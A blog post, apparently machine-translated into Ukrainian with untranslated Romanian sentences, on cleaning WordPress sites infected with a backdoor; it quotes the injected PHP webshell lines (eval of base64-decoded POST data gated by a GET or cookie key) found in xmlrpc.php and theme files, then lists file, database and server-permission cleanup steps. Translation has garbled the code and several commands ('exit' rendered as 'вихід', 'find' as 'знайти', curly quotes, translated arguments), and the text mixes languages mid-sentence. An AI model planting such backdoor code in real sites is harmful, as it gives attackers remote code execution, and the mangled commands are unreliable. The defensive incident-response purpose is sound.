Перш ніж прочитати цей пост, ви повинні побачити пост тут, зрозуміти щось. :)

Я знайшов у кількох файлах блогів на stealthsettings.com коди, схожі на наведені нижче, які з’явилися в результаті зараження використання WordPress.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘файл’])); вихід; } ?>

і

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘файл’])); вихід; } ?>

У наведеному вище випадку мова йде про файл xmlrpc.php з Сонний, але в один grep на сервері, видно, що таких кодів в джерелах досить багато.

Очищення заражених файлів:

Ооооккккйоуак
1. Найкраще рішення після завершення резервна коп- і почистив базу даних, це sa Видаляти файли WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘файл’])); вихід; } ?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”

3. in /tmp , шукати та видаляти такі папки, як tmpYwbzT2

Очищення SQL :

1. в таблиці табл wp_options подивіться, чи він існує, і видаліть рядки: внутрішній_кеш_посилань, rss_f541b3abd05e7962fcab37737f40fad8 і wordpress_options.

2. Також у wp_options перейдіть до active_plugins і видаліть, якщо він є, плагін, який закінчується на одне з розширень *_new.php, *_old.php, *.jpgg, *.giff, *.pngg або якщо це інше підозріле розширення, уважно перевірте.

3. У табл wp_users, подивіться, чи є користувач, у якого праворуч у стовпці нічого не написано user_nicename. Видаліть цього користувача, але запам’ятайте номер у стовпці ID. Цей користувач, імовірно, використовуватиме "WordPress" як user_login і здається, що його було створено в дату 00:00:00 0000-00-00.

4. Підійдіть до столу wp_usermeta і видаліть усі рядки, які належать ідентифікатору вище.

Після очищення sql деактивуйте, а потім активуйте якийсь плагін. (в блозі –> Приладова панель –> Плагіни)

Безпека сервера:

1. Подивіться, які каталоги та файли "доступний для запису” (chmod 777) і спробуйте поставити a чмод що більше не дозволить їх написання на будь-якому рівні. (наприклад, chmod 644)

знайти . -perm -2 –l

2. Подивіться, які файли встановлюють біт південь або кататися на ковзанах . Якщо ви не використовуєте ці файли, встановіть їх chmod 0 або видаліть пакет, який їх містить. Вони дуже небезпечні, тому що страчують з привілеями "група"Або"корінь”, а не з привілеями звичайного користувача, який виконує цей файл.

find / -type f -perm -04000 -ls
find / -type f -perm -02000 -ls

3. Перевірте, які порти відкриті, і спробуйте закрити або захистити ті, які не використовуються.

netstat -an | grep -i список

Це приблизно все. Я це бачу деякі блоги заборонені пошуком Google, а інші кажуть "Молодець!!!" . Ну, я б зробив це за них... але що скажеш, якщо Google почне банити всі сайти хто робить Я СПАМІМ і пакує трояни (Trojan.Clicker.HTML) у печиво?